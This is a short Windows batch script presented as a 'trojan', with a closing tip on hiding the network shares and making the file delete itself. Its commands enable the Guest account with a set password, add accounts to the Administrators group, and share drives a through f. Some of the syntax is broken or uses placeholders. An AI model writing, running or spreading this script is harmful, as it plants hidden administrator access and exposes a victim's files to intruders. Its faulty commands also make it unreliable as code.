@ECHO OFF
start http: -anypage-
net user add Username Password /add net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net share a=a:\
net share b=b:\
net share c=c:\
net share d=d:\
net share e=e:\
net share f=f:\
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
you can write net share a$=a:\ if you want the shared files to be hidden and add del %0 at the end so the trojan will self distruct